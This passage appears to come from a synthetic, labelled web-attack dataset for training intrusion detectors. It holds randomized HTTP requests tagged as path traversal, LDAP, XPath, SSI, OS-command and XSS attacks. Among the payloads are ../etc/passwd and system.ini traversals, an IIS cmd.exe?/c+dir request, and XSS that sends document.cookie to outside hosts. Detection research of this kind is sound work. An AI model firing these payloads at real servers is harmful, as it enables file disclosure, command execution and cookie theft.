If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 4.1
Pragma: at='lribde'
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: /cwnYnreh/Nasesss/teITl/siNyaims.asmx
TE: deflate;q=0.7,trailers
Trailer: Via
User-Agent: y6oHME http://www.lrbiLhW.biz
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: i2m/4.5 www.hrf6lnaE.tiff, 0.4 237.135.7.15
Transfer-Encoding: compress
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

iyce0ehtsdaet=wherezv&xmluBbgsoundW120T=3euopusrng&qmtoedifneag1=yCr]4%&iWt=uuope7esetz&9saogsn=ssie ae hwuel$&ejtiectuisarLea=beuaoa:whsqus&0oreammmr4Cgih=cPDr@ajlKQZh&rametae4dZ5=ncie &@WVKNVk6CVM=RaldAsboet&nSevsh=formv&etnvd=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&VMU@=3749666781&rtthen6aiibax=meta2ev~c5;aE9glH]lnr=h&Sleslclee=e0z4ge2RVW0

End - Id: 36263
Start - Id: 46094
class: PathTransversal
PUT /epKkKl4HnOik/5rcJX4/ai26B-4Kovn4b_V/2kxrs08qXM.1Q.shtml? HTTP/1.0
Content-Length: 310
Content-Language: sed,w
Content-Encoding: compress
Content-Location: /lent/iiezryu.swf
Content-MD5: bm8xb3Qyb2VndGlzbXRiMg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 25 Jun 08 02:14:13 CET
Host: 131.117.10.40
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-greek;q=0.7, x-mac-japanese;q=0.2, isiri-3342
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 92.99.137.196
Cookie: ulKbecmuh=5341739;tr1sv2tuc=33428637;dyevtcthMjt=sWyX;NgUZ5=q g;eEhmaNattnie=xeEsma/moptgftp
Cookie2: $Version="0"
Date: Fri, 29 Jan 10 23:14:35 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: Siau=psbut;juzsygh
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 8374
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Referer: http://www.darseiD.ch/4fuI/eichse/sceztL/geemGre/rri7yuc.jpeg
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: scetbthtoi/6.5.0.9
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: hsde
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vtsmaryeseL58=irhd9nlj&du24h1n0naty=495721&e6RscahhdAeo=imncwthsbeSh&_IbuophpqKd=621218839&oMca471WJUJD=\<uw )lMi9Alnn@sel&ed1eaRnfdieoiee=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&szkxra=1t]z5mGcr7oa&RB7mXch8T=sl<5 

End - Id: 46094
Start - Id: 37140
class: LdapInjection
GET /Eq2su3amjosaososar/olwiXrx7Bi/gyvHENM_/vPR/9r/l5mqcYts/ihLdTovecho3yrcpgW.nsf?iSo7in5r0l=+7s%29evale%26ivnaS+&sKBimg_2NiiPPI=qouao&wrin=%29+++%28++++%7C+++%28displayName%3Dhad*%29+%28name+%3Dhad*++%29%28++mail%3Dhad*+++%29&dlfdthtiril3e=1&abrtrdp=72&qpila=zerhbbe&rrr2u=euteg%7Ee+&Hpk9JM=stoSsh8en4dg&8ddbelmh=paner&girentnL=0949445621&meh7lo=aQF&hUJ2g=e%7E&nmeeo=3457135179 HTTP/1.0
Host: 191.69.102.116
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.207.13.158
Cookie: bQpositionnM.=iyfK;eiohboeceoo3=00177;DosoAnt2=heo1;copydivVu7DKpeU=42370082
Cookie2: $Version="916"
Date: Sat, 01 Mar 08 15:55:13 GMT
ETag: W/"0xXDm_hysMwnCgoAJ"
Expect: dlmehE
From: m0oefy@tNuodgrTta.org
If-Modified-Since: Wed, 16 Apr 08 01:09:28 UTC
If-Unmodified-Since: Tue, 03 Jul 07 14:51:01 GMT
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Tue, 23 Mar 04 09:19:07 GMT
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic ZW1hb0VlOmlzZW1Oaw==
Range: 1-,52545-
Referer: /ataeeeQ.ace
TE: trailers,chunked;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: hTEngcNrht (ubz.-0; t4uZgE1; 6krBXN2; r7ohk_..; d2wi8H5)
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/7.6 157.177.143.16, 0.9 www.liim.css
Transfer-Encoding: ipygh; gcnr=ZesHaeG
Upgrade: lunch/5.6, pdEss0/7.0, krsnd/5.3, eeh7tt/5.5, oqeat/4.8
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37140
Start - Id: 37065
class: LdapInjection
GET /ebaair9lailEe/i285n0/c1FG/rtldcaloitlo7/wdamozco4g/7AzY7xp_NZ.nsf?ayat4tstcRs=dauInK&nREeetp=%29+++%28++++%7C%28displayName%3Dhad*%29%28name++++%3D++had*++++%29%28+++mail%3Dhad*+++%29&mc=axTTeteor&thttp0pXhttp2O=252871&oSeraadqt=u%27wmuhwtC&aersoE=purwbNenlc5zh HTTP/1.1
Host: www.9r73i.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.87.115.154
Cookie: leesi4i3=3
Cookie2: $Version="212"
Date: Sun, 30 Dec 07 13:14:51 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: "81I0yXm7WJssAtFypo0U"
If-None-Match: "iH6GTZsjCvihiJ.7"
If-Range: *
Max-Forwards: 372
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Digest nc=1E7CAAFB
Range: 03242-,-0
Referer: http://rpgaSs.net/Ildne/pShBomm.exe
TE: gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: iydandsuli9x
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/8.7 86.180.61.185
Transfer-Encoding: compress
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 595061014884085769
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37065
Start - Id: 48722
class: XPathInjection
GET /sJeErue/fsinlzaicoqcc/mX2pP2gwD_t0pKnq60q/at9etnzaxAtpi5gi/cmNPHWs4mT-yFC@hWf/pxCViP/anebersMizan/_5lNGNA/tnaqtefpnEfsnS3m/eevnAw/h2IHu@XoO_n/CTTVXjXK.jpg?-IDD22lW=elac7pol20ahoe&ch7geei=54769&clozheeqhRie=petLwoyntcged7&ttn=location94%29hli7hsdgrautoexecrers&55eeifmlrt0rAyi=itn4forttEi&snMnaKeKeesrp=aLINnElmred2esniuF&OQFBmV6gIH=gNoptiiddkj&repso=70+or++nbh%2FHsilp%2Fnytsz%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or+++++93864%3D HTTP/1.0
Host: 194.136.180.19
Connection: aecoW
Accept: image/gif, application/*;q=0.5
Accept-Charset: cp-936;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: ay1y-4, Eesz-dehanEd;q=0.2, O3ebs-m79re, Lytetha-nzhgy5l7;q=0.8, odjvz6ee-2kad
Cache-Control: mtont='b4a5nvhm'
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="96"
Date: Sun, 28 Feb 10 23:29:52 UTC
ETag: W/"yhMn62dM5xWKyaoz2U"
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Thu, 28 Apr 05 04:37:48 UTC
If-Unmodified-Since: Tue, 04 Oct 05 03:08:56 GMT
If-Match: "3VPG4W1@UZ_oAAAC"
If-None-Match: *
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 21
Pragma: no-cache
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 7-577073
Referer: http://www.qdut.fr/psPJeWi.msf
Trailer: Upgrade
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 6.3; oo-cc; rv:2.3.6) Gecko/32019045
UA-CPU: MIPS
UA-Pixels: 0339x4942
Via: lrci/5.7 224.152.2.79, FTP/9.5 www.tsynDl.jpg:324
Transfer-Encoding: hr5re
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48722
Start - Id: 44184
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 254.203.21.150:69158
Connection: khaXM8
Accept: application/*, video/*, application/rtf;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.3, cp-950;q=0.9, us-ascii, koi8;q=0.7, windows-1254;q=0.2
Accept-Encoding: identity, identity;q=0.9
Accept-Language: to-2eXTna;q=0.7, t-u8;q=0.0, av-eoAoe;q=0.1, dcCP-xyxanq;q=0.0, nOeqamf-cgu;q=0.9
Cache-Control: min-fresh=23
Client-ip: 163.193.116.46
Cookie: ydghbite9htgFt=ie-yNbnV0U;enh8w=e@qal
Cookie2: $Version="67"
Date: Fri, 27 Feb 09 16:17:51 CET
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 24 Mar 10 09:47:51 UTC
If-Unmodified-Since: Tue, 02 May 06 03:03:17 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 4.3
Pragma: t9dw='r4Nm'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 5-,-97,-5
Referer: /iiFo5ei/rwClev/R79rnwtb.php
TE: trailers
Trailer: Upgrade
User-Agent: ineyn (wFnjPhN0)
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 9.4 35.174.121.35, tadhoe/8.3 82.252.108.104:8, 0.6 www.dbethx.tiff
Transfer-Encoding: deflate
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44184
Start - Id: 48393
class: XPathInjection
GET /2Tnodegbn_xdautoexeciw/hxHJ6Fp3bS/r6OG/agpi4scmfaEih/lG3jAeXMKw/gjjpD6KNoaQ07GBSKa/aqhtacces6.PKNGXpassthrumfHM.exe?mEFud=a HTTP/1.1
Host: www.ra6p.biz
Connection: 4tbreykt
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip, compress, deflate;q=0.1
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 52.116.138.154
Cookie: thiAe=cSowd;dt2eq6uadis=59210 or     count(path/child::node()[position()=((i+j+k+l+1)]   |  path/child::*()[position()=(k+1)])=1  or  585=
Cookie2: $Version="14"
Date: Fri, 04 Jun 04 06:12:06 UTC
ETag: "o.e.Okr@JEYerTuKvnt"
Expect: 100-continue
From: nemysAe@Nhoe.ch
If-Modified-Since: Sat, 14 Mar 09 11:21:22 GMT
If-Unmodified-Since: Fri, 19 Oct 07 22:38:29 CET
If-Match: "wpoxN6ItgsdRboGogLT"
If-None-Match: *
If-Range: *
Max-Forwards: 607
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: DAdt gmre7ee=iiTe
Authorization: NTLM NG9DaGVzZGVuc3Jlc2FpeWxVc3lybGVkbXRhb2lld212aW9sRk8y
Range: 6-4347,22520-
Referer: http://alnHr.it/8runahae/n3slfka/oMerees7/geiobyfm.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.2 (X11; U; Linux i586 6.5; t1-rg; rv:7.7.7) Gecko/61557574
UA-CPU: PowerPC
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 128x9065
Via: HTTP/5.5 www.oleyneos.jpeg
Transfer-Encoding: nsrfe; ottp=iqtexmaL
Upgrade: rneref/8.4, taa/5.0, weepaf/3.3
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Serial-Number: 5741877656321
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48393
Start - Id: 36016
class: PathTransversal
GET /iyrdLsth.asp?2Eu6QnetcatM4HG=iruifwmeamgtiist&Aha1qhtlswmOmu=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: www.odieotuT.org:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 207.134.145.3
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Thu, 19 Oct 06 05:52:44 GMT
From: e1ea@teeopdrn.uk
If-Unmodified-Since: Sun, 04 May 08 14:26:31 UTC
If-Match: "IRdcB7tlKped9mNUh"
If-None-Match: *
Max-Forwards: 63
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: tbnei oiec=eotufe
Referer: http://heco.be/eezstt.exe
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 6.0; rA-tx; rv:7.9.8) Gecko/88487146
Via: 8.3 www.Agnadl.tiff
Warning: 550 140.13.48.198 "z9natieLeldihi1yr" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36016
Start - Id: 40628
class: SSI
GET /tW7J4w/kOmEjOR/a5NzNIYv.yDQGrwygm_q/enE0@9/9C/8ammOskalpemceht/tdfsrea/1Qbi9ft@EoJUwDVIuH00/3R-jshutdownBA.html?iaatnzhej6laN=WREeorrnnhrn1rGiee&i71iOyynehJg=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&.H2Vwc4fzkh=55367&ioBo=mi%3D%3Dack+yeaaS HTTP/1.0
Host: 89.12.205.18
Connection: close
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.3
Accept-Encoding: 
Accept-Language: uPf-nilrNs;q=0.7, oa-enTd, etlth-m, dyh7-sawt;q=0.8, hi-ZrVvxgi;q=0.6
Cache-Control: max-stale=0
Client-ip: 134.67.83.123
Cookie: rraoo=22520
Cookie2: $Version="48"
Date: Thu, 04 Feb 10 01:14:40 CET
ETag: "xYxHxKo7LnHV.m68tgT"
Expect: 100-continue
From: 0huf@noaNaeeh.cz
If-Modified-Since: Mon, 29 Nov 04 23:23:58 GMT
If-Unmodified-Since: Mon, 10 Jan 05 16:33:13 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Dec 04 24:39:31 GMT
Max-Forwards: 5077
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: wssi Mwmtoon=YEtd6
Authorization: oWis nNNdt=vijfe
Range: -8,-65
Referer: http://www.ando.net/TcAryHor.shtml
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 9.2; Cm-gn; rv:5.2.0) Gecko/82714679
UA-Disp: 959,926,32
Via: HTTP/6.2 186.215.138.155
Transfer-Encoding: ri2g
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40628
Start - Id: 36133
class: PathTransversal
GET /loisnrttiio6nee/dienetyalerifn/2M7b/eQvzNXXRin9qz86/iSXVn-/h5fcp/oala6wDeh81iefs/zwY131XX27swmqxX/z_omw2mjtN.php4?3v8H=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&bfttehnedhttivQ=ceumuf_fLTrZ&t-oD=eLh9Hzr5yX&taia=709&soenfltwn=+inputy&eym25rtres9xaba=8022548955&0myada=daes4&f7bAlooistxttot=477957&nsnfutuyoD=odttth75d&at9lrc3nu=dtaWZvelkdgroup+by3a&MektMmsnhlh6o=887045421&rsr91i9toahss=xbUzm&e4ioCgylalrm=673420&nee=Ag4c HTTP/1.0
Host: 239.126.19.163
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=48
Client-ip: 77.156.80.102
Cookie: Ermocha27NNeQcopy=0fGYbn;ic=5
Cookie2: $Version="150"
Date: Thu, 05 Feb 09 13:39:50 UTC
ETag: "lMBZg_LeLLpyz7x8YDp."
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Fri, 09 Feb 07 21:31:03 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 May 09 24:01:01 CET
Max-Forwards: 558
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: /h6Ab/e7o4e/sfhptp/ciosUte/ttgs6r.css
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: gbMpuo (eMTZEj; e3RXd9k-)
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7606x3250
Via: HTTP/7.4 254.203.131.165, HTTP/3.6 www.tqsfSao.gif, 1.4 www.teae.htm
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36133
Start - Id: 43069
class: OsCommanding
POST /ee9/sV/tstesao23urkIbasar/8.ftu37--Ee4/mQR2PRjIAwJ.cgi? HTTP/1.0
Content-Length: 235
Content-Language: ersrtaro
Content-Encoding: gzip
Content-Location: /nteikbwr/5sadS5tM/gebst2dN/etnea0ys/eeor.exe
Content-MD5: ZTVoZGluWDhhbmxBaGhjcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Sun, 22 Jul 07 02:42:10 GMT
Host: www.lem0h7qas.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate, identity, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.80.6.131
Cookie: ueatc=pxaa;34RXdBT7r=1kiBv;tse=7377;mq6lOsat6ta=hcR9pplagk;en212bboevtdtdI=hio
Cookie2: $Version="1"
Date: Sat, 24 Feb 07 10:13:31 CET
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: dshn
From: sTleEdu@dtAttFd.de
If-Modified-Since: Tue, 13 Oct 09 10:18:33 GMT
If-Unmodified-Since: Mon, 17 Aug 09 08:57:21 GMT
If-Match: "yELw96P@2kUYhHnCzF"
If-None-Match: "dsj7aAzseQ1@tddd"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Digest realm
Range: 53-,7351-3480
Referer: /5ec0wqu/nbte.tiff
TE: gzip;q=0.0,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/9.0 (X11; U; Open BSD i586 6.8; Al-td; rv:9.1.2) Gecko/54443086
UA-CPU: StrongARM
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: identity
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

eBEeOmueadL=va&a2cghekop6oaa=yynv5arP8UEE&c9e=0&dll7ami=hDoiwfrjcsUd&railncoregoaI7=iuhUn8antstt5ei8&5KRg=awVV9C0We.8&wetees=raAn%ar a&enilrntmgt=/bin/ps%00   |&vzumet=:ov 3ecg4hr"$S"urj&Fe.tV=309&dfhieinqeco=guHfnwno

End - Id: 43069
Start - Id: 47623
class: XSS
GET /tpasswdCod0a5CTTLIoptO/iwyl/mKTHk25n@xU74NYSg6y@/dFx/a@0q/yfee/-WwT3limgVexo2/bsasltYerrSglst3RfeA/t4HzSqvMv70bxuK-v14/mie84Ntg/rci3aEenpm0Otu/eoPa8G_ukboBFm.htm?y8tReXseas=%3Cinput++type++%3D+++%22+image+++%22++dynsrc++++%3D++%22++++javascript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.erni.com%2Fcgi-bin%2Fmaoran.cgi%27%2Bdocument.cookie%29%3B%5D++%22+++%3E HTTP/1.0
Host: 219.198.111.95
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 158.187.180.34
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="97"
Date: Sat, 24 Jan 04 23:35:48 GMT
ETag: W/"h1nKfSruLg2mDIS"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: *
If-Range: Sun, 10 Jul 05 19:57:30 UTC
Max-Forwards: 52
MIME-Version: 5.8
Pragma: Yi0eeina='xIphsatb'
Proxy-Authorization: Digest cnonce="femknga"
Authorization: Digest opaque="zfn1lxd"
Range: 545-82205,788-76233
Referer: http://www.p9bn.de/kniuBsnt/wc7n3ssn.gif
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: igrnue (ezzw6HeN; eFYxkhc; aAy1-h1@; 2bANA6CK; nz0snixfP)
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: dvo/8.7 www.nhabn.jpg, HTTP/8.2 98.68.186.11, FTP/5.0 www.oS7tcr8a.js
Transfer-Encoding: deflate
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47623
Start - Id: 47698
class: XSS
GET /uATej_h/2rt/ouct/ndsihnrtI/wiii/nY@DPR0ejUIR1@Q3/wugsqrr/mqiesuHb/aAtmcsyigi/h9jxmlT3KSwaxmlHj7/CVWGn6cHi1E4Z/wMqVltccbBljll1fl0-@.php3?OUsuGA0td=rmeOmhceg&dcomevneaImteT=dKdLi4LRY&2ihnselseeeatte=%3Cimg++++src%3D+++%22isalmellde%3E+++%22+++++onmouseover%3D+%22+%5Bwindow.open%28%27http%3A%2F%2F67.5.66.188%2Fge.dll%27%2Bdocument.cookie%29%3B%5D++%22+%3E&1lddeihrtrasoi=38&f5UtvVhtacces=e6O8aTgoddeIrk&eTtw=7&ludprh=no&gEhoyan=uO0rdywenyneeob&SkV5dQQpluBdocument=8venr HTTP/1.0
Host: 169.121.51.57
Connection: tr0i
Accept: text/html;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: 1sve-ltteostw;q=0.9, Deer-edy;q=0.2, gofet-el;q=0.1
Cache-Control: max-age=9217
Client-ip: 29.159.169.244
Cookie: we3eoe2raectd=4
Cookie2: $Version="67"
Date: Tue, 15 Aug 06 21:15:32 CET
ETag: "eymgqpKzdWID58x"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 25 Mar 05 03:18:43 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:37 CET
If-Match: "wXI3e.h9C7SyKpllUh"
If-None-Match: "rU@.2AWJWkPMQAD3"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic dG9wczppd25PSWllYw==
Range: 834-
Referer: http://talno.uk/ga5pEe/s1Caet8/he5s4/5uur/enu6.php
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: aSeeel0 (hnMNONZa; el7H5R6)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: eo6rT; aceaAthf=wueou9
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 43077850041
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47698
Start - Id: 44464
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lEs8Kwwt.com:80
Connection: close
Accept: image/*;q=0.9, application/postscript
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: zsds-tRu;q=0.0, tie8-i;q=0.4
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: rmsta=5386057;iet=jvoqsa
Cookie2: $Version="3"
Date: Mon, 22 Dec 08 06:46:05 UTC
ETag: "ncWhZyIkfm16R43rU5u"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: "chCm2R5CdRZa_Cb"
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Wed, 03 Aug 05 11:26:20 GMT
Max-Forwards: 414
MIME-Version: 3.4
